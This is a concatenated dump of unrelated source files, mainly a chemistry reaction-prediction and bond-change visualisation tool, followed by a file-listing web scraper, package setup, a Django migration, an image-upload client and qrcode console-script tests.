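mol2 = Chem.MolFromSmiles(mapped)
for atom in mol2.GetAtoms():
    atom.SetAtomMapNum(0)                       # 0 clears the map number
assert Chem.MolToSmiles(mol2) == "CCO"
```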
        arg_list_src = [(element, src_mask, src_bond, src_aroma, src_charge, None)]\n        result_src = map(result2mol, arg_list_src)\n        result_src = list(result_src)\n        mol_ori = None\n        for item in result_src:\n            mol_ori = item[0]\n        src_mol_adj = Chem.GetAdjacencyMatrix(mol_ori)\n\n        mol_pred, pred_smile_atom_mapping, pred_valid, pred_bond, pred_aroma, pred_charge, pred_smile_no_atom_map = self.predict(\n            dl)\n\n        pred_mol_adj = Chem.GetAdjacencyMatrix(mol_pred)\n        diff_adj = pred_mol_adj - src_mol_adj\n\n        return smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj, \\\n               mol_ori, mol_pred\n\n    def get_reaction_info(self, elements, diff):\n        element_symbols = [\"H\", \"He\", \"Li\", \"Be\", \"B\", \"C\", \"N\", \"O\", \"F\", \"Ne\", \"Na\", \"Mg\", \"Al\", \"Si\", \"P\", \"S\", \"Cl\",\n                           \"Ar\", \"K\", \"Ca\", \"Sc\", \"Ti\", \"V\", \"Cr\", \"Mn\", \"Fe\", \"Co\", \"Ni\", \"Cu\", \"Zn\", \"Ga\", \"Ge\", \"As\",\n                           \"Se\", \"Br\", \"Kr\", \"Rb\", \"Sr\", \"Y\", \"Zr\", \"Nb\", \"Mo\", \"Tc\", \"Ru\", \"Rh\", \"Pd\", \"Ag\", \"Cd\",\n                           \"In\", \"Sn\", \"Sb\", \"Te\", \"I\", \"Xe\", \"Cs\", \"Ba\", \"La\", \"Ce\", \"Pr\", \"Nd\", \"Pm\", \"Sm\", \"Eu\",\n                           \"Gd\", \"Tb\", \"Dy\", \"Ho\", \"Er\", \"Tm\", \"Yb\", \"Lu\", \"Hf\", \"Ta\", \"W\", \"Re\", \"Os\", \"Ir\", \"Pt\",\n                           \"Au\", \"Hg\", \"Tl\", \"Pb\", \"Bi\", \"Po\", \"At\", \"Rn\", \"Fr\", \"Ra\", \"Ac\", \"Th\", \"Pa\", \"U\", \"Np\",\n                           \"Pu\", \"Am\", \"Cm\", \"Bk\", \"Cf\", \"Es\", \"Fm\", \"Md\", \"No\", \"Lr\", \"Rf\", \"Db\", \"Sg\", \"Bh\", \"Hs\",\n                           \"Mt\", \"Ds\", \"Rg\", \"Cn\", \"Nh\", \"Fl\", \"Mc\", \"Lv\", \"Ts\", \"Og\"]\n\n        reaction_info = []\n\n        for i in range(len(diff)):\n            for j in range(i + 1, len(diff)):\n                if diff[i][j] >= 1:\n                    reaction_info.append(\n                        f\"Formation of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n                elif diff[i][j] <= -1:\n                    reaction_info.append(\n                        f\"Breaking of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n\n        return reaction_info\n\n    def draw_reaction_graph(self, mol_ori, mol_pred, diff, pic_name_ori):\n\n        # for mol_ori: highlight the bonds that are broken\n        for i in range(len(diff)):\n            for j in range(i + 1, len(diff)):\n                if diff[i][j] == -1:\n                    mol_ori.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Broken\")\n\n        d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n        d2d.drawOptions().addAtomIndices = True\n        d2d.drawOptions().setHighlightColour((0.8, 0.8, 0.8))\n        d2d.DrawMolecule(mol_ori, highlightAtoms=[], highlightBonds=[0, 1])\n        d2d.FinishDrawing()\n        svg = d2d.GetDrawingText()\n        with open('../tests/image/' + pic_name_ori + '.svg', 'w') as f:\n            f.write(svg)\n\n        # for mol_pred: highlight the bonds that are formed\n        for i in range(len(diff)):\n            for j in range(i + 1, len(diff)):\n                if diff[i][j] == 1:\n                    mol_pred.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Formed\")\n\n        d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n        d2d.drawOptions().addAtomIndices = True\n        d2d.drawOptions().setHighlightColour((0.8, 0.8, 0.8))\n        d2d.DrawMolecule(mol_pred, highlightAtoms=[], highlightBonds=[0, 1])\n        d2d.FinishDrawing()\n        # SVG(d2d.GetDrawingText())\n        svg = d2d.GetDrawingText()\n        with open('../tests/image/' + 'predicted products of' + pic_name_ori + '.svg', 'w') as f:\n            f.write(svg)\n\n    def _run(self, reactants_smile: str) -> str:\n        # smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj\n        reactant_mask = 
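An aside on the bond-change bookkeeping behind get_reaction_info, in isolation: subtracting the reactant adjacency matrix from the product one leaves +1 where a bond formed and -1 where one broke. The matrices below are illustrative 3-atom toys, not real reaction output.

```python
import numpy as np

src = np.array([[0, 1, 0],
                [1, 0, 0],
                [0, 0, 0]])
pred = np.array([[0, 0, 0],
                 [0, 0, 1],
                 [0, 1, 0]])
diff = pred - src

formed = [(i, j) for i in range(3) for j in range(i + 1, 3) if diff[i][j] >= 1]
broken = [(i, j) for i in range(3) for j in range(i + 1, 3) if diff[i][j] <= -1]
assert formed == [(1, 2)] and broken == [(0, 1)]
```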
None\n smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_mapping, src_element, diff_, \\\n mol_ori, mol_pred = self.pred_from_smiles(reactants_smile, reactant_mask=reactant_mask)\n explain = self.get_reaction_info(src_element, diff_)\n self.draw_reaction_graph(mol_ori, mol_pred, diff_, smile_no_atom_map)\n return '\\n'.join(['reactants SMILES:' + smile_no_atom_map,\n 'reactants after atom mapping:' + smile_atom_map,\n 'predicted products with atom mapping:' + pred_smile_atom_mapping,\n 'predicted products without atom mapping:' + pred_smile_no_atom_mapping,\n 'Changes in Covalent Bonds in Reactions'\n ] + explain)\n\n\nclass ReactionT5(BaseTool):\n name = 'reaction_t5'\n description = ('Predict the product of a chemical reaction')\n\n def __init__(self, model_name=\"t5-large\", verbose=False):\n super().__init__(verbose=verbose)\n self.model_name = model_name\n self.tokenizer = AutoTokenizer.from_pretrained('sagawa/ReactionT5-product-prediction')\n self.model = T5ForConditionalGeneration.from_pretrained('sagawa/ReactionT5-product-prediction')\n\n def _run(self, input_smiles: str) -> str:\n inp = self.tokenizer(f'REACTANT:{input_smiles}REAGENT:', return_tensors='pt')\n output = self.model.generate(**inp, min_length=6, max_length=109, num_beams=1, num_return_sequences=1,\n return_dict_in_generate=True, output_scores=True)\n output = self.tokenizer.decode(output['sequences'][0], skip_special_tokens=True).replace(' ', '').rstrip('.')\n return output\n\n async def _arun(self, smiles_pair: str) -> str:\n \"\"\"Use the tool asynchronously.\"\"\"\n raise NotImplementedError()\n\n\nclass NERF_know_reagents(BaseTool):\n name = 'NERF_know_reagents'\n description = (\n 'Given the reactants and reagents (where reagents can be None) of a chemical reaction, Predict the product of a chemical ' +\n 'reaction. Input SMILES string of reactants and reagents separately, output the change of bonds ' +\n 'and the SMILES of predicted products.' 
+\n        'Strictly follow the input format, this is an example of input:\"Reactants:CS(=O)(=O)OC[C@H]1CCC(=O)O1 Reagents:Fc1ccc(Nc2ncnc3cc(OCCN4CCNCC4)c(OC4CCCC4)cc23)cc1Cl\"' +\n        'You should replace the SMILES string with your own targeted SMILES string that is given in the question.')\n    # checkpoint = \"epoch-232-loss-0.5991340563215058\"\n    # checkpoint = \"epoch-171-loss-0.6919782893504469\"\n    checkpoint = \"epoch-199-loss-0.5907546520840412\"\n\n    def map_atoms_in_smiles(self, smiles):\n        mol = Chem.MolFromSmiles(smiles)\n\n        if mol is None:\n            return None\n\n        atom_map = {}\n        for atom in mol.GetAtoms():\n            atom.SetAtomMapNum(atom.GetIdx() + 1)\n            atom_map[atom.GetIdx()] = atom.GetIdx() + 1\n\n        mapped_smiles = Chem.MolToSmiles(mol, canonical=True, isomericSmiles=True)\n        return mapped_smiles\n\n    def process_smiles(self, smiles, reactant_mask):\n        # apply atom mapping when needed (map_atoms=True means the SMILES is not mapped yet)\n        # reactant_mask is a list whose length is the number of molecules: 1 for reactant, 0 for reagent\n        map_atoms = need_atom_mapping(smiles)\n        if map_atoms:\n            smiles_atom_mapped = self.map_atoms_in_smiles(smiles)\n            smiles_no_atom_mapped = smiles\n        else:\n            smiles_no_atom_mapped = clear_atom_map_smiles(smiles)\n            smiles_atom_mapped = smiles\n\n        reactant_mols = [Chem.MolFromSmiles(item) for item in smiles_atom_mapped.split(\".\")]\n        reactant_len = Chem.MolFromSmiles(smiles_atom_mapped).GetNumAtoms()\n\n        reactant_features = molecule(reactant_mols, reactant_len, reactant_mask)\n\n        element = reactant_features['element']\n        mask = reactant_features['mask']\n        bond = reactant_features['bond']\n        aroma = reactant_features['aroma']\n        charge = reactant_features['charge']\n\n        input_data = {}\n        for key in reactant_features:\n            if key in [\"element\", \"reactant\"]:\n                input_data[key] = reactant_features[key]\n            else:\n                input_data['src_' + key] = reactant_features[key]\n\n        data = [input_data]\n\n        full_dataset = TransformerDataset(False, data)\n\n        data_loader = DataLoader(full_dataset,\n                                 batch_size=1,\n                                 num_workers=4, collate_fn=TransformerDataset.collate_fn)\n\n        return data_loader, element, mask, bond, aroma, charge, smiles_atom_mapped, smiles_no_atom_mapped\n\n    def init_model(self, save_path, checkpoint):\n        state_dict = {}\n        map_location = {'cuda:%d' % 0: 'cuda:%d' % 0}\n        checkpoint = torch.load(os.path.join(save_path, checkpoint), map_location=map_location)\n        for key in checkpoint['model_state_dict']:\n            if key in state_dict:\n                state_dict[key] += checkpoint['model_state_dict'][key]\n            else:\n                state_dict[key] = checkpoint['model_state_dict'][key]\n\n        model = MoleculeVAE(args, 100, 192, 6).to('cpu')  # TODO\n        model.load_state_dict(state_dict)\n\n        return model\n\n    def predict(self, data_loader,\n                save_path='../chemagent/tools/NERF/CKPT/', checkpoint=checkpoint, temperature=0):\n\n        model = self.init_model(save_path, checkpoint)\n\n        for data in data_loader:  # only one batch\n            data_gpu = {}\n            for key in data:\n                data_gpu[key] = data[key].to('cpu')\n\n            predicted_dict = model('sample', data_gpu, temperature)\n\n            element = data['element']\n            src_mask = data['src_mask']\n            pred_bond = predicted_dict['bond'].cpu()\n            pred_aroma, pred_charge = predicted_dict['aroma'].cpu(), predicted_dict['charge'].cpu()\n\n            arg_list = [(element[j], src_mask[j], pred_bond[j], pred_aroma[j], pred_charge[j], None) for j in\n                        range(1)]\n\n            res = map(result2mol, arg_list)\n            res = list(res)\n\n            for item in res:\n                mol, smile, valid, smile_no_map, adj_matrix_pred = item[0], item[1], item[2], item[3], item[4]\n\n        return mol, smile, valid, pred_bond, pred_aroma, pred_charge, smile_no_map, adj_matrix_pred\n
\n    def pred_from_reactants_reagents(self, reactants, reagents):\n        # build the atom-mapped input SMILES; reagents may be None, so only\n        # join when they are present (joining with None would raise TypeError)\n        if reagents is not None:\n            smiles = '.'.join([reactants, reagents])\n            reactant_mask = [1 for _ in reactants.split('.')] + [0 for _ in reagents.split('.')]\n        else:\n            smiles = reactants\n            reactant_mask = [1 for _ in reactants.split('.')]\n        dl, element, src_mask, src_bond, src_aroma, src_charge, smile_atom_map, smile_no_atom_map = self.process_smiles(\n            smiles, reactant_mask)\n        arg_list_src = [(element, src_mask, src_bond, src_aroma, src_charge, None)]\n        result_src = map(result2mol, arg_list_src)\n        result_src = list(result_src)\n        for item in result_src:\n            mol_ori = item[0]\n            adj_matrix_ori = item[4]\n            src_mol_adj = Chem.GetAdjacencyMatrix(item[0])  # TODO check this; result2mol returns adj_matrix_ori, predict returns adj_matrix_pred\n\n        pred_mol, pred_smile_atom_mapping, pred_valid, pred_bond, pred_aroma, pred_charge, pred_smile_no_atom_map, adj_matrix_pred = self.predict(\n            dl)\n\n        pred_mol_adj = Chem.GetAdjacencyMatrix(pred_mol)\n        diff_adj = adj_matrix_pred.adj_matrix.numpy() - adj_matrix_ori.adj_matrix.numpy()\n\n        return smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj, \\\n               mol_ori, pred_mol\n\n    def get_reaction_info(self, elements, diff):\n        element_symbols = [\"H\", \"He\", \"Li\", \"Be\", \"B\", \"C\", \"N\", \"O\", \"F\", \"Ne\", \"Na\", \"Mg\", \"Al\", \"Si\", \"P\", \"S\", \"Cl\",\n                           \"Ar\", \"K\", \"Ca\", \"Sc\", \"Ti\", \"V\", \"Cr\", \"Mn\", \"Fe\", \"Co\", \"Ni\", \"Cu\", \"Zn\", \"Ga\", \"Ge\", \"As\",\n                           \"Se\", \"Br\", \"Kr\", \"Rb\", \"Sr\", \"Y\", \"Zr\", \"Nb\", \"Mo\", \"Tc\", \"Ru\", \"Rh\", \"Pd\", \"Ag\", \"Cd\",\n                           \"In\", \"Sn\", \"Sb\", \"Te\", \"I\", \"Xe\", \"Cs\", \"Ba\", \"La\", \"Ce\", \"Pr\", \"Nd\", \"Pm\", \"Sm\", \"Eu\",\n                           \"Gd\", \"Tb\", \"Dy\", \"Ho\", \"Er\", \"Tm\", \"Yb\", \"Lu\", \"Hf\", \"Ta\", \"W\", \"Re\", \"Os\", \"Ir\", \"Pt\",\n                           \"Au\", \"Hg\", \"Tl\", \"Pb\", \"Bi\", \"Po\", \"At\", \"Rn\", \"Fr\", \"Ra\", \"Ac\", \"Th\", \"Pa\", \"U\", \"Np\",\n                           \"Pu\", \"Am\", \"Cm\", \"Bk\", \"Cf\", \"Es\", \"Fm\", \"Md\", \"No\", \"Lr\", \"Rf\", \"Db\", \"Sg\", \"Bh\", \"Hs\",\n                           \"Mt\", \"Ds\", \"Rg\", \"Cn\", \"Nh\", \"Fl\", \"Mc\", \"Lv\", \"Ts\", \"Og\"]\n\n        reaction_info = []\n\n        for i in range(len(diff)):\n            for j in range(i + 1, len(diff)):\n                if diff[i][j] == 1:\n                    reaction_info.append(\n                        f\"Formation of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n                elif diff[i][j] == -1:\n                    reaction_info.append(\n                        f\"Breaking of bond between atom {i + 1} ({element_symbols[elements[i] - 1]} element) and atom {j + 1} ({element_symbols[elements[j] - 1]} element)\")\n\n        return reaction_info\n\n    def draw_reaction_graph1(self, mol_ori, mol_pred, diff, pic_name_ori):\n        # for mol_ori: highlight the bonds that are broken\n        bond_hilights_ori = []\n        for i in range(len(diff)):\n            for j in range(i + 1, len(diff)):\n                if diff[i][j] == -1:\n                    mol_ori.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Broken\")\n                    bond_hilights_ori.append(mol_ori.GetBondBetweenAtoms(i, j).GetIdx())\n\n        # for mol_pred: highlight the bonds that are formed\n        bond_hilights_pred = []\n        for i in range(len(diff)):\n            for j in range(i + 1, len(diff)):\n                if diff[i][j] == 1:\n                    mol_pred.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Formed\")\n                    bond_hilights_pred.append(mol_pred.GetBondBetweenAtoms(i, j).GetIdx())\n\n        # Create an RDKit Mol object for the second molecule\n        mol_pred_highlighted = 
Chem.Mol(mol_pred)\n\n # Highlight bonds in the second molecule\n for bond_idx in bond_hilights_pred:\n mol_pred_highlighted.GetBondWithIdx(bond_idx).SetProp(\"bondNote\", \"Formed\")\n\n # Create an RDKit Mol object for the first molecule\n mol_ori_highlighted = Chem.Mol(mol_ori)\n\n # Highlight bonds in the first molecule\n for bond_idx in bond_hilights_ori:\n mol_ori_highlighted.GetBondWithIdx(bond_idx).SetProp(\"bondNote\", \"Broken\")\n\n # Create a grid image with both molecules and their highlights\n img = Draw.MolsToGridImage([mol_ori_highlighted, mol_pred_highlighted],\n molsPerRow=2, subImgSize=(200, 200),\n legends=['Original', 'Predicted'],\n useSVG=True)\n with open('../tests/image/' + '1reaction:' + pic_name_ori + '.svg', 'w') as f:\n f.write(img.data)\n # img.save('../tests/image/' + 'reaction_comparison_highlighted_' + pic_name_ori + '.png')\n\n def draw_reaction_graph(self, mol_ori, mol_pred, reagents_smiles, diff, pic_name_ori):\n if len(pic_name_ori) > 20:\n pic_name_ori = pic_name_ori[:20]\n\n # reagents_mol = Chem.MolFromSmiles(reagents_smiles)\n ori_smiles = Chem.MolToSmiles(mol_ori).split('.')\n pred_smiles = Chem.MolToSmiles(mol_pred).split('.')\n reagents_smiles = []\n for o in ori_smiles:\n if o in pred_smiles:\n reagents_smiles.append(o)\n\n reagents_smiles = Chem.MolFromSmiles('.'.join(reagents_smiles))\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().setHighlightColour((1.0, 0.5, 0.0))\n d2d.DrawMolecule(reagents_smiles)\n d2d.FinishDrawing()\n svg = d2d.GetDrawingText()\n with open('../tests/image/reagents_' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n # for mol_ori: highlight the bonds that are broken\n bond_hilights = []\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] <= -1:\n mol_ori.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Broken\")\n bond_hilights.append(mol_ori.GetBondBetweenAtoms(i, j).GetIdx())\n\n atom_hilights_ori = [i for i in range(len(mol_ori.GetAtoms())) if\n any(diff[i][j] <= -1 for j in range(len(diff)))]\n\n mol_ori = Chem.DeleteSubstructs(mol_ori, reagents_smiles, onlyFrags=True)\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().addAtomIndices = True\n d2d.drawOptions().setHighlightColour((1.0, 0.5, 0.0))\n d2d.DrawMolecule(mol_ori, highlightAtoms=atom_hilights_ori, highlightBonds=bond_hilights)\n d2d.FinishDrawing()\n svg = d2d.GetDrawingText()\n with open('../tests/image/' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n # for mol_pred: highlight the bonds that are formed\n bond_hilights = []\n for i in range(len(diff)):\n for j in range(i + 1, len(diff)):\n if diff[i][j] >= 1:\n mol_pred.GetBondBetweenAtoms(i, j).SetProp(\"bondNote\", \"Formed\")\n bond_hilights.append(mol_pred.GetBondBetweenAtoms(i, j).GetIdx())\n\n atom_hilights_pred = [i for i in range(len(mol_ori.GetAtoms())) if\n any(diff[i][j] >= 1 for j in range(len(diff)))]\n\n mol_pred = Chem.DeleteSubstructs(mol_pred, reagents_smiles, onlyFrags=True)\n\n d2d = rdMolDraw2D.MolDraw2DSVG(350, 300)\n d2d.drawOptions().addAtomIndices = True\n d2d.drawOptions().setHighlightColour((1.0, 0.5, 0.0))\n d2d.DrawMolecule(mol_pred, highlightAtoms=atom_hilights_pred, highlightBonds=bond_hilights)\n d2d.FinishDrawing()\n # SVG(d2d.GetDrawingText())\n svg = d2d.GetDrawingText()\n with open('../tests/image/' + 'predicted products of' + pic_name_ori + '.svg', 'w') as f:\n f.write(svg)\n\n def draw_reaction(self, mol_ori, mol_pred, pic_name_ori):\n if len(pic_name_ori) > 20:\n pic_name_ori = 
pic_name_ori[:20]\n\n smile_ori = Chem.MolToSmiles(mol_ori)\n smile_pred = Chem.MolToSmiles(mol_pred)\n\n rxn = AllChem.ReactionFromSmarts(smile_ori + '>>' + smile_pred)\n d2d = Draw.MolDraw2DCairo(800, 400)\n d2d.DrawReaction(rxn, highlightByReactant=True)\n\n # svg = d2d.GetDrawingText()\n # with open('../tests/image/' + 'reaction_' + pic_name_ori + '.svg', 'w') as f:\n # f.write(svg)\n\n import io\n bio = io.BytesIO(d2d.GetDrawingText())\n open('../tests/image/' + 'reaction_' + pic_name_ori + '.png', 'wb+').write(bio.getvalue())\n\n def _run(self, input_string: str) -> str:\n # smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_map, element, diff_adj\n cleaned_input = input_string.replace(\" \", \"\").lower()\n cleaned_input1 = input_string.replace(\" \", \"\")\n\n reactants_index = cleaned_input.find(\"reactants:\")\n reagents_index = cleaned_input.find(\"reagents:\")\n\n if reactants_index == -1 or reagents_index == -1:\n return None, None\n\n reactants = cleaned_input1[reactants_index + 10:reagents_index].strip()\n reagents = cleaned_input1[reagents_index + 9:].strip()\n\n smile_atom_map, smile_no_atom_map, pred_smile_atom_mapping, pred_smile_no_atom_mapping, src_element, diff_, \\\n mol_ori, mol_pred = self.pred_from_reactants_reagents(reactants, reagents)\n self.draw_reaction_graph(mol_ori, mol_pred, reagents, diff_, smile_no_atom_map)\n self.draw_reaction(mol_ori, mol_pred, smile_no_atom_map)\n explain = self.get_reaction_info(src_element, diff_)\n return '\\n'.join(['reactants SMILES:' + smile_no_atom_map,\n 'reactants after atom mapping:' + smile_atom_map,\n 'predicted products with atom mapping:' + pred_smile_atom_mapping,\n 'predicted products without atom mapping:' + pred_smile_no_atom_mapping,\n 'Changes in Covalent Bonds in Reactions'\n ] + explain)\n","repo_name":"Arlene036/ChemAgent_NERF","sub_path":"chemagent/tools/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":28657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"36321767931","text":"# coding=utf-8\n\nfrom sandcrawler.scraper import ScraperBase\nfrom sandcrawler.scraper import SimpleScraperBase\n\n\nclass FileCatch(SimpleScraperBase):\n BASE_URL = 'http://filecatch.com'\n\n SINGLE_RESULTS_PAGE = True # in reality - no\n\n def setup(self):\n self.register_scraper_type(ScraperBase.SCRAPER_TYPE_OSP)\n self.search_term_language = 'eng'\n\n self.register_media(ScraperBase.MEDIA_TYPE_FILM)\n self.register_media(ScraperBase.MEDIA_TYPE_TV)\n self.register_media(ScraperBase.MEDIA_TYPE_BOOK)\n self.register_media(ScraperBase.MEDIA_TYPE_GAME)\n self.register_media(ScraperBase.MEDIA_TYPE_OTHER)\n\n for url in [self.BASE_URL, ]: # + self.OTHER_URLS:\n self.register_url(ScraperBase.URL_TYPE_SEARCH, url)\n self.register_url(ScraperBase.URL_TYPE_LISTING, url)\n\n self.proxy_region = 'nl' # at least not US!\n\n self._request_connect_timeout = 60\n self._request_response_timeout = 120\n\n def search(self, search_term, media_type, **extra):\n soup = self.get_soup(self._fetch_search_url(search_term, media_type))\n\n if not soup.select('#search_paging a'):\n self.submit_search_no_results()\n return\n\n max_page_num = int(soup.select('#search_paging a')[-1].href.split('&p=')[1])\n\n for page in range(1, max_page_num + 1):\n if not self.can_fetch_next():\n continue\n if page > 1:\n soup = self.get_soup(self._fetch_search_url(search_term, media_type, page=page))\n for link in soup.select('.btn.icon.adddwnl'):\n 
self.submit_search_result(link_title=link.attrs['title'][10:],\n link_url=self._fetch_search_url(search_term, media_type, page=page))\n\n # self.submit_parse_result(link_title=link.attrs['title'][10:],\n # link_url=link['href']\n # )\n self.log.debug('-----------------')\n\n def _fetch_no_results_text(self):\n return u' No files found.'\n\n def _fetch_search_url(self, search_term, media_type, page=1):\n return self.BASE_URL + '/?q=' + self.util.quote(search_term) + ('&p=%s' % page if page > 1 else '')\n\n def _parse_parse_page(self, soup):\n for link in soup.select('.btn.icon.adddwnl'):\n self.submit_parse_result(index_page_title=soup.title.text.strip(), link_title=link.attrs['title'][10:],\n link_url=link['href']\n )\n","repo_name":"realchief/Scraping_BeautifulSoup_phantomjs","sub_path":"scrapers/filecatch_com.py","file_name":"filecatch_com.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"31071810551","text":"from setuptools import setup\n\nimport pathlib\nHERE = pathlib.Path(__file__).parent\nREADME = (HERE / \"README.md\").read_text()\n\nsetup(name='gefera',\n version='0.1',\n description='two-body mutual transit light curves',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url='http://github.com/tagordon/gefera',\n author='Tyler Gordon',\n author_email='tagordon@uw.edu',\n license='MIT',\n packages=['gefera'],\n install_requires=['numpy'],\n zip_safe=False)\n\n","repo_name":"tagordon/exomoon_transits","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"7571093528","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('models', '0002_room_index'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='room',\n name='total_viewers',\n field=models.CharField(max_length=200),\n ),\n ]\n","repo_name":"johnlpuc163/zhibogame_django","sub_path":"models/migrations/0003_auto_20151010_1817.py","file_name":"0003_auto_20151010_1817.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35018115789","text":"#Test the model with test images\n#here are some images located at: https://oreil.ly/dEUpx\n#you can try your own images. 
note: the model is training on images with whitebackground\nimport sys\nimport requests\n\nif(len(sys.argv) > 1):\n r = requests.get('http://localhost')\n print(r.text)\n\n inputfile = sys.argv[1]\n \"\"\" post image and return the response \"\"\"\n my_img = {'image': open(inputfile, 'rb')}\n r = requests.post('http://localhost/ml', files=my_img)\n print(r.text)\n\nelse:\n r = requests.get('http://localhost')\n print(r.text)\n","repo_name":"2GoodPhoU/RockPaperScissorsML","sub_path":"Sy_Assignment5/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71518864951","text":"import io\nimport os\nimport sys\nimport unittest\nfrom tempfile import mkdtemp\nfrom unittest import mock\n\nfrom qrcode.compat.pil import Image\nfrom qrcode.console_scripts import commas, main\n\n\ndef bad_read():\n raise UnicodeDecodeError(\"utf-8\", b\"0x80\", 0, 1, \"invalid start byte\")\n\n\nclass ScriptTest(unittest.TestCase):\n def setUp(self):\n self.tmpdir = mkdtemp()\n\n def tearDown(self):\n os.rmdir(self.tmpdir)\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n def test_isatty(self, mock_print_ascii):\n main([\"testtext\"])\n mock_print_ascii.assert_called_with(tty=True)\n\n @mock.patch(\"os.isatty\", lambda *args: False)\n @mock.patch(\"sys.stdout\")\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_piped(self, mock_stdout):\n main([\"testtext\"])\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n @mock.patch(\"sys.stdin\")\n def test_stdin(self, mock_stdin, mock_print_ascii):\n mock_stdin.buffer.read.return_value = \"testtext\"\n main([])\n self.assertTrue(mock_stdin.buffer.read.called)\n mock_print_ascii.assert_called_with(tty=True)\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n def test_stdin_py3_unicodedecodeerror(self, mock_print_ascii):\n mock_stdin = mock.Mock(sys.stdin)\n mock_stdin.buffer.read.return_value = \"testtext\"\n mock_stdin.read.side_effect = bad_read\n with mock.patch(\"sys.stdin\", mock_stdin):\n # sys.stdin.read() will raise an error...\n self.assertRaises(UnicodeDecodeError, sys.stdin.read)\n # ... 
but it won't be used now.\n main([])\n mock_print_ascii.assert_called_with(tty=True)\n\n @mock.patch(\"os.isatty\", lambda *args: True)\n @mock.patch(\"qrcode.main.QRCode.print_ascii\")\n def test_optimize(self, mock_print_ascii):\n main(\"testtext --optimize 0\".split())\n\n @mock.patch(\"sys.stdout\")\n def test_factory(self, mock_stdout):\n main(\"testtext --factory svg\".split())\n\n @mock.patch(\"sys.stderr\")\n def test_bad_factory(self, mock_stderr):\n self.assertRaises(SystemExit, main, \"testtext --factory fish\".split())\n\n @mock.patch.object(sys, \"argv\", \"qr testtext output\".split())\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_sys_argv(self):\n main()\n\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_output(self):\n tmpfile = os.path.join(self.tmpdir, \"test.png\")\n main([\"testtext\", \"--output\", tmpfile])\n os.remove(tmpfile)\n\n @mock.patch(\"sys.stderr\", new_callable=io.StringIO)\n @unittest.skipIf(not Image, \"Requires PIL\")\n def test_factory_drawer_none(self, mock_stderr):\n with self.assertRaises(SystemExit):\n main(\"testtext --factory pil --factory-drawer nope\".split())\n self.assertIn(\n \"The selected factory has no drawer aliases\", mock_stderr.getvalue()\n )\n\n @mock.patch(\"sys.stderr\", new_callable=io.StringIO)\n def test_factory_drawer_bad(self, mock_stderr):\n with self.assertRaises(SystemExit):\n main(\"testtext --factory svg --factory-drawer sobad\".split())\n self.assertIn(\"sobad factory drawer not found\", mock_stderr.getvalue())\n\n @mock.patch(\"sys.stderr\", new_callable=io.StringIO)\n def test_factory_drawer(self, mock_stderr):\n main(\"testtext --factory svg --factory-drawer circle\".split())\n\n def test_commas(self):\n self.assertEqual(commas([]), \"\")\n self.assertEqual(commas([\"A\"]), \"A\")\n self.assertEqual(commas(\"AB\"), \"A or B\")\n self.assertEqual(commas(\"ABC\"), \"A, B or C\")\n self.assertEqual(commas(\"ABC\", joiner=\"and\"), \"A, B and C\")\n","repo_name":"lincolnloop/python-qrcode","sub_path":"qrcode/tests/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":3955,"dataset":"github-code","pt":"94"} +{"seq_id":"15536291205","text":"from django.core.management.base import BaseCommand\n\nfrom project_one.thirdapp.models import Article\n\n\nclass Command(BaseCommand):\n help = 'Update article by ID.'\n\n def add_arguments(self, parser):\n parser.add_argument('pk', type=int, help='Article ID')\n parser.add_argument('title', type=str, help='Article title')\n parser.add_argument('content', type=str, help='Article content')\n 